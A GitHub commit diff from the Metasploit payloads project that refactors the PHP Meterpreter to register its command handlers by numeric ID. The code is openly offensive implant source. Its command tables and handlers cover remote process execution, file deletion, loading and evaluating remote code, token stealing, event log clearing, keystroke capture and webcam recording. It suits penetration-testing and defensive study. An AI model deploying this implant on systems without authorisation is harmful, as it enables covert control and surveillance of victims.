github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-20 20:37:27 +01:00
Code Releases Activity

Update PHP meterpreter to support UINT command IDs

Browse Source
This commit is contained in:
OJ 2020-04-29 15:42:25 +10:00
parent c7f7bc2fc0
commit c9284388d9
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
2 changed files with 1079 additions and 896 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

203
php/meterpreter/ext_server_stdapi.php
View File

@ -170,6 +170,127 @@ define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
# errors.
define("ERROR_CONNECTION_ERROR", 10000);
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-29 04:46:37 UTC
# IDs for stdapi
define('COMMAND_ID_STDAPI_FS_CHDIR', 1001);
define('COMMAND_ID_STDAPI_FS_CHMOD', 1002);
define('COMMAND_ID_STDAPI_FS_DELETE_DIR', 1003);
define('COMMAND_ID_STDAPI_FS_DELETE_FILE', 1004);
define('COMMAND_ID_STDAPI_FS_FILE_COPY', 1005);
define('COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH', 1006);
define('COMMAND_ID_STDAPI_FS_FILE_MOVE', 1007);
define('COMMAND_ID_STDAPI_FS_GETWD', 1008);
define('COMMAND_ID_STDAPI_FS_LS', 1009);
define('COMMAND_ID_STDAPI_FS_MD5', 1010);
define('COMMAND_ID_STDAPI_FS_MKDIR', 1011);
define('COMMAND_ID_STDAPI_FS_MOUNT_SHOW', 1012);
define('COMMAND_ID_STDAPI_FS_SEARCH', 1013);
define('COMMAND_ID_STDAPI_FS_SEPARATOR', 1014);
define('COMMAND_ID_STDAPI_FS_SHA1', 1015);
define('COMMAND_ID_STDAPI_FS_STAT', 1016);
define('COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE', 1017);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE', 1018);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES', 1019);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT', 1020);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY', 1021);
define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES', 1022);
define('COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE', 1023);
define('COMMAND_ID_STDAPI_NET_RESOLVE_HOST', 1024);
define('COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS', 1025);
define('COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN', 1026);
define('COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN', 1027);
define('COMMAND_ID_STDAPI_RAILGUN_API', 1028);
define('COMMAND_ID_STDAPI_RAILGUN_API_MULTI', 1029);
define('COMMAND_ID_STDAPI_RAILGUN_MEMREAD', 1030);
define('COMMAND_ID_STDAPI_RAILGUN_MEMWRITE', 1031);
define('COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS', 1032);
define('COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY', 1033);
define('COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY', 1034);
define('COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY', 1035);
define('COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE', 1036);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY', 1037);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT', 1038);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE', 1039);
define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT', 1040);
define('COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY', 1041);
define('COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY', 1042);
define('COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY', 1043);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS', 1044);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE', 1045);
define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT', 1046);
define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE', 1047);
define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT', 1048);
define('COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY', 1049);
define('COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST', 1050);
define('COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN', 1051);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETENV', 1052);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS', 1053);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETSID', 1054);
define('COMMAND_ID_STDAPI_SYS_CONFIG_GETUID', 1055);
define('COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME', 1056);
define('COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF', 1057);
define('COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN', 1058);
define('COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO', 1059);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR', 1060);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE', 1061);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS', 1062);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST', 1063);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN', 1064);
define('COMMAND_ID_STDAPI_SYS_EVENTLOG_READ', 1065);
define('COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS', 1066);
define('COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH', 1067);
define('COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE', 1068);
define('COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE', 1069);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO', 1070);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES', 1071);
define('COMMAND_ID_STDAPI_SYS_PROCESS_GETPID', 1072);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES', 1073);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS', 1074);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD', 1075);
define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD', 1076);
define('COMMAND_ID_STDAPI_SYS_PROCESS_KILL', 1077);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE', 1078);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE', 1079);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK', 1080);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT', 1081);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY', 1082);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ', 1083);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK', 1084);
define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE', 1085);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE', 1086);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE', 1087);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS', 1088);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN', 1089);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS', 1090);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME', 1091);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS', 1092);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND', 1093);
define('COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE', 1094);
define('COMMAND_ID_STDAPI_SYS_PROCESS_WAIT', 1095);
define('COMMAND_ID_STDAPI_UI_DESKTOP_ENUM', 1096);
define('COMMAND_ID_STDAPI_UI_DESKTOP_GET', 1097);
define('COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT', 1098);
define('COMMAND_ID_STDAPI_UI_DESKTOP_SET', 1099);
define('COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD', 1100);
define('COMMAND_ID_STDAPI_UI_ENABLE_MOUSE', 1101);
define('COMMAND_ID_STDAPI_UI_GET_IDLE_TIME', 1102);
define('COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8', 1103);
define('COMMAND_ID_STDAPI_UI_SEND_KEYEVENT', 1104);
define('COMMAND_ID_STDAPI_UI_SEND_KEYS', 1105);
define('COMMAND_ID_STDAPI_UI_SEND_MOUSE', 1106);
define('COMMAND_ID_STDAPI_UI_START_KEYSCAN', 1107);
define('COMMAND_ID_STDAPI_UI_STOP_KEYSCAN', 1108);
define('COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP', 1109);
define('COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD', 1110);
define('COMMAND_ID_STDAPI_WEBCAM_GET_FRAME', 1111);
define('COMMAND_ID_STDAPI_WEBCAM_LIST', 1112);
define('COMMAND_ID_STDAPI_WEBCAM_START', 1113);
define('COMMAND_ID_STDAPI_WEBCAM_STOP', 1114);
# ---------------------------------------------------------------
# Wrap everything in checks for existence of the new functions in case we get
# eval'd twice
my_print("Evaling stdapi");
@ -319,7 +440,7 @@ function add_stat_buf($path) {
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
register_command('stdapi_fs_file_expand_path');
register_command('stdapi_fs_file_expand_path', COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH);
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -358,7 +479,7 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
}
if (!function_exists('stdapi_fs_delete_dir')) {
register_command('stdapi_fs_delete_dir');
register_command('stdapi_fs_delete_dir', COMMAND_ID_STDAPI_FS_DELETE_DIR);
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -368,7 +489,7 @@ function stdapi_fs_delete_dir($req, &$pkt) {
}
if (!function_exists('stdapi_fs_mkdir')) {
register_command('stdapi_fs_mkdir');
register_command('stdapi_fs_mkdir', COMMAND_ID_STDAPI_FS_MKDIR);
function stdapi_fs_mkdir($req, &$pkt) {
my_print("doing mkdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -379,7 +500,7 @@ function stdapi_fs_mkdir($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_chdir')) {
register_command('stdapi_fs_chdir');
register_command('stdapi_fs_chdir', COMMAND_ID_STDAPI_FS_CHDIR);
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -388,24 +509,9 @@ function stdapi_fs_chdir($req, &$pkt) {
}
}
# works
if (!function_exists('stdapi_fs_delete')) {
register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
$path = canonicalize_path($path_tlv['value']);
if (is_windows()) {
exec("attrib.exe -r ".$path);
}
$ret = @unlink($path);
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_file_move')) {
register_command('stdapi_fs_file_move');
register_command('stdapi_fs_file_move', COMMAND_ID_STDAPI_FS_FILE_MOVE);
function stdapi_fs_file_move($req, &$pkt) {
my_print("doing mv");
$old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@ -419,7 +525,7 @@ function stdapi_fs_file_move($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_file_copy')) {
register_command('stdapi_fs_file_copy');
register_command('stdapi_fs_file_copy', COMMAND_ID_STDAPI_FS_FILE_COPY);
function stdapi_fs_file_copy($req, &$pkt) {
my_print("doing cp");
$old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@ -433,7 +539,7 @@ function stdapi_fs_file_copy($req, &$pkt) {
# works on Unix systems but probably not on Windows
if (!function_exists('stdapi_fs_chmod') && !is_windows()) {
register_command('stdapi_fs_chmod');
register_command('stdapi_fs_chmod', COMMAND_ID_STDAPI_FS_CHMOD);
function stdapi_fs_chmod($req, &$pkt) {
my_print("doing chmod");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -447,7 +553,7 @@ function stdapi_fs_chmod($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_getwd')) {
register_command('stdapi_fs_getwd');
register_command('stdapi_fs_getwd', COMMAND_ID_STDAPI_FS_GETWD);
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@ -458,7 +564,7 @@ function stdapi_fs_getwd($req, &$pkt) {
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
register_command('stdapi_fs_ls');
register_command('stdapi_fs_ls', COMMAND_ID_STDAPI_FS_LS);
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -485,7 +591,7 @@ function stdapi_fs_ls($req, &$pkt) {
}
if (!function_exists('stdapi_fs_separator')) {
register_command('stdapi_fs_separator');
register_command('stdapi_fs_separator', COMMAND_ID_STDAPI_FS_SEPARATOR);
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
@ -493,7 +599,7 @@ function stdapi_fs_separator($req, &$pkt) {
}
if (!function_exists('stdapi_fs_stat')) {
register_command('stdapi_fs_stat');
register_command('stdapi_fs_stat', COMMAND_ID_STDAPI_FS_STAT);
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -510,7 +616,7 @@ function stdapi_fs_stat($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete_file')) {
register_command('stdapi_fs_delete_file');
register_command('stdapi_fs_delete_file', COMMAND_ID_STDAPI_FS_DELETE_FILE);
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -526,7 +632,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
}
if (!function_exists('stdapi_fs_search')) {
register_command('stdapi_fs_search');
register_command('stdapi_fs_search', COMMAND_ID_STDAPI_FS_SEARCH);
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
@ -566,7 +672,7 @@ function stdapi_fs_search($req, &$pkt) {
if (!function_exists('stdapi_fs_md5')) {
register_command("stdapi_fs_md5");
register_command("stdapi_fs_md5", COMMAND_ID_STDAPI_FS_MD5);
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = canonicalize_path($path_tlv['value']);
@ -584,7 +690,7 @@ function stdapi_fs_md5($req, &$pkt) {
if (!function_exists('stdapi_fs_sha1')) {
register_command("stdapi_fs_sha1");
register_command("stdapi_fs_sha1", COMMAND_ID_STDAPI_FS_SHA1);
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = canonicalize_path($path_tlv['value']);
@ -605,9 +711,8 @@ function stdapi_fs_sha1($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_config_getuid')) {
register_command('stdapi_sys_config_getuid');
register_command('stdapi_sys_config_getuid', COMMAND_ID_STDAPI_SYS_CONFIG_GETUID);
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
$uid = posix_getuid();
$pwinfo = posix_getpwuid($uid);
@ -618,13 +723,14 @@ function stdapi_sys_config_getuid($req, &$pkt) {
# instead.
$user = get_current_user() . " (" . getmyuid() . ")";
}
my_print("getuid - returning: " . $user);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
register_command('stdapi_sys_config_getenv', COMMAND_ID_STDAPI_SYS_CONFIG_GETENV);
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
@ -658,18 +764,9 @@ function stdapi_sys_config_getenv($req, &$pkt) {
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
#function stdapi_sys_config_rev2self($req, &$pkt) {
# my_print("doing rev2self");
# return ERROR_FAILURE;
#}
#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
register_command('stdapi_sys_config_sysinfo');
register_command('stdapi_sys_config_sysinfo', COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO);
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@ -679,7 +776,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
}
if (!function_exists('stdapi_sys_config_localtime')) {
register_command('stdapi_sys_config_localtime');
register_command('stdapi_sys_config_localtime', COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME);
function stdapi_sys_config_localtime($req, &$pkt) {
my_print("doing localtime");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LOCAL_DATETIME, strftime("%Y-%m-%d %H:%M:%S %Z (UTC%z)")));
@ -691,7 +788,7 @@ function stdapi_sys_config_localtime($req, &$pkt) {
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
register_command('stdapi_sys_process_execute');
register_command('stdapi_sys_process_execute', COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE);
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
@ -766,7 +863,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
if (!function_exists('stdapi_sys_process_close')) {
register_command('stdapi_sys_process_close');
register_command('stdapi_sys_process_close', COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE);
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
@ -820,7 +917,7 @@ function close_process($proc) {
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
register_command('stdapi_sys_process_get_processes');
register_command('stdapi_sys_process_get_processes', COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES);
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
@ -870,7 +967,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_process_getpid')) {
register_command('stdapi_sys_process_getpid');
register_command('stdapi_sys_process_getpid', COMMAND_ID_STDAPI_SYS_PROCESS_GETPID);
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@ -879,7 +976,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
}
if (!function_exists('stdapi_sys_process_kill')) {
register_command('stdapi_sys_process_kill');
register_command('stdapi_sys_process_kill', COMMAND_ID_STDAPI_SYS_PROCESS_KILL);
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
@ -910,7 +1007,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
register_command('stdapi_net_socket_tcp_shutdown');
register_command('stdapi_net_socket_tcp_shutdown', COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN);
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@ -952,7 +1049,7 @@ function deregister_registry_key($id) {
if (!function_exists('stdapi_registry_create_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_create_key');
register_command('stdapi_registry_create_key', COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY);
}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
@ -988,7 +1085,7 @@ function stdapi_registry_create_key($req, &$pkt) {
if (!function_exists('stdapi_registry_close_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_close_key');
register_command('stdapi_registry_close_key', COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY);
}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
@ -1009,7 +1106,7 @@ function stdapi_registry_close_key($req, &$pkt) {
if (!function_exists('stdapi_registry_query_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_query_value');
register_command('stdapi_registry_query_value', COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE);
}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {

188
php/meterpreter/meterpreter.php
View File

@ -30,16 +30,15 @@ if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array();
}
# global list of extension commands
if (!isset($GLOBALS['commands'])) {
$GLOBALS['commands'] = array("core_loadlib", "core_machine_id", "core_set_uuid",
"core_set_session_guid", "core_get_session_guid", "core_negotiate_tlv_encryption");
# global map of command ids to callable handlers
if (!isset($GLOBALS['id2f'])) {
$GLOBALS['id2f'] = array();
}
function register_command($c) {
global $commands;
if (! in_array($c, $commands)) {
array_push($commands, $c);
function register_command($c, $i) {
global $id2f;
if (! in_array($i, $id2f)) {
$id2f[$i] = $c;
}
}
@ -82,7 +81,7 @@ function dump_channels($extra="") {
# Doesn't exist before php 4.3
if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
function file_get_contents($file) {
$f = @fopen($file,"rb");
$contents = false;
if ($f) {
@ -90,14 +89,14 @@ function file_get_contents($file) {
}
fclose($f);
return $contents;
}
}
}
# Renamed in php 4.3
if (!function_exists('socket_set_option')) {
function socket_set_option($sock, $type, $opt, $value) {
function socket_set_option($sock, $type, $opt, $value) {
socket_setopt($sock, $type, $opt, $value);
}
}
}
#
@ -149,11 +148,12 @@ define("TLV_EXTENSIONS", 20000);
define("TLV_USER", 40000);
define("TLV_TEMP", 60000);
#
# TLV Specific Types
#
define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0);
define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1);
define("TLV_TYPE_COMMAND_ID", TLV_META_TYPE_UINT | 1);
define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2);
define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3);
define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4);
@ -200,13 +200,53 @@ function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
}
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-29 04:46:37 UTC
# IDs for metsrv
define('COMMAND_ID_CORE_CHANNEL_CLOSE', 1);
define('COMMAND_ID_CORE_CHANNEL_EOF', 2);
define('COMMAND_ID_CORE_CHANNEL_INTERACT', 3);
define('COMMAND_ID_CORE_CHANNEL_OPEN', 4);
define('COMMAND_ID_CORE_CHANNEL_READ', 5);
define('COMMAND_ID_CORE_CHANNEL_SEEK', 6);
define('COMMAND_ID_CORE_CHANNEL_TELL', 7);
define('COMMAND_ID_CORE_CHANNEL_WRITE', 8);
define('COMMAND_ID_CORE_CONSOLE_WRITE', 9);
define('COMMAND_ID_CORE_ENUMEXTCMD', 10);
define('COMMAND_ID_CORE_GET_SESSION_GUID', 11);
define('COMMAND_ID_CORE_LOADLIB', 12);
define('COMMAND_ID_CORE_MACHINE_ID', 13);
define('COMMAND_ID_CORE_MIGRATE', 14);
define('COMMAND_ID_CORE_NATIVE_ARCH', 15);
define('COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION', 16);
define('COMMAND_ID_CORE_PATCH_URL', 17);
define('COMMAND_ID_CORE_PIVOT_ADD', 18);
define('COMMAND_ID_CORE_PIVOT_REMOVE', 19);
define('COMMAND_ID_CORE_PIVOT_SESSION_DIED', 20);
define('COMMAND_ID_CORE_SET_SESSION_GUID', 21);
define('COMMAND_ID_CORE_SET_UUID', 22);
define('COMMAND_ID_CORE_SHUTDOWN', 23);
define('COMMAND_ID_CORE_TRANSPORT_ADD', 24);
define('COMMAND_ID_CORE_TRANSPORT_CHANGE', 25);
define('COMMAND_ID_CORE_TRANSPORT_GETCERTHASH', 26);
define('COMMAND_ID_CORE_TRANSPORT_LIST', 27);
define('COMMAND_ID_CORE_TRANSPORT_NEXT', 28);
define('COMMAND_ID_CORE_TRANSPORT_PREV', 29);
define('COMMAND_ID_CORE_TRANSPORT_REMOVE', 30);
define('COMMAND_ID_CORE_TRANSPORT_SETCERTHASH', 31);
define('COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS', 32);
define('COMMAND_ID_CORE_TRANSPORT_SLEEP', 33);
# ---------------------------------------------------------------
##
# Worker functions
##
function core_channel_open($req, &$pkt) {
if (!function_exists('core_channel_open')) {
register_command('core_channel_open', COMMAND_ID_CORE_CHANNEL_OPEN);
function core_channel_open($req, &$pkt) {
$type_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_TYPE);
my_print("Client wants a ". $type_tlv['value'] ." channel, i'll see what i can do");
@ -223,10 +263,13 @@ function core_channel_open($req, &$pkt) {
}
return $ret;
}
}
# Works for streams
function core_channel_eof($req, &$pkt) {
if (!function_exists('core_channel_eof')) {
register_command('core_channel_eof', COMMAND_ID_CORE_CHANNEL_EOF);
function core_channel_eof($req, &$pkt) {
my_print("doing channel eof");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$c = get_channel_by_id($chan_tlv['value']);
@ -241,10 +284,13 @@ function core_channel_eof($req, &$pkt) {
} else {
return ERROR_FAILURE;
}
}
}
# Works
function core_channel_read($req, &$pkt) {
if (!function_exists('core_channel_read')) {
register_command('core_channel_read', COMMAND_ID_CORE_CHANNEL_READ);
function core_channel_read($req, &$pkt) {
my_print("doing channel read");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
@ -258,10 +304,13 @@ function core_channel_read($req, &$pkt) {
$res = ERROR_SUCCESS;
}
return $res;
}
}
# Works
function core_channel_write($req, &$pkt) {
if (!function_exists('core_channel_write')) {
register_command('core_channel_write', COMMAND_ID_CORE_CHANNEL_WRITE);
function core_channel_write($req, &$pkt) {
#my_print("doing channel write");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$data_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_DATA);
@ -277,12 +326,15 @@ function core_channel_write($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, $wrote));
return ERROR_SUCCESS;
}
}
}
#
# This is called when the client wants to close a channel explicitly. Not to be confused with
# This is called when the client wants to close a channel explicitly.
#
function core_channel_close($req, &$pkt) {
if (!function_exists('core_channel_close')) {
register_command('core_channel_close', COMMAND_ID_CORE_CHANNEL_CLOSE);
function core_channel_close($req, &$pkt) {
global $channel_process_map;
# XXX remove the closed channel from $readers
my_print("doing channel close");
@ -310,12 +362,14 @@ function core_channel_close($req, &$pkt) {
dump_channels("after close");
return ERROR_FAILURE;
}
}
#
# Destroy a channel and all associated handles.
#
function channel_close_handles($cid) {
if (!function_exists('channel_close_handles')) {
function channel_close_handles($cid) {
global $channels;
# Sanity check - make sure a channel with the given cid exists
@ -337,6 +391,7 @@ function channel_close_handles($cid) {
if (strlen($c['data']) == 0) {
channel_remove($cid);
}
}
}
function channel_remove($cid) {
@ -344,7 +399,9 @@ function channel_remove($cid) {
unset($channels[$cid]);
}
function core_channel_interact($req, &$pkt) {
if (!function_exists('core_channel_interact')) {
register_command('core_channel_interact', COMMAND_ID_CORE_CHANNEL_INTERACT);
function core_channel_interact($req, &$pkt) {
global $readers;
my_print("doing channel interact");
@ -395,6 +452,7 @@ function core_channel_interact($req, &$pkt) {
$ret = ERROR_FAILURE;
}
return $ret;
}
}
function interacting($cid) {
@ -407,25 +465,30 @@ function interacting($cid) {
}
function core_shutdown($req, &$pkt) {
if (!function_exists('core_shutdown')) {
register_command('core_shutdown', COMMAND_ID_CORE_SHUTDOWN);
function core_shutdown($req, &$pkt) {
my_print("doing core shutdown");
die();
}
}
# zlib support is not compiled in by default, so this makes sure the library
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
global $commands;
if (!function_exists('core_loadlib')) {
register_command('core_loadlib', COMMAND_ID_CORE_LOADLIB);
function core_loadlib($req, &$pkt) {
global $id2f;
my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
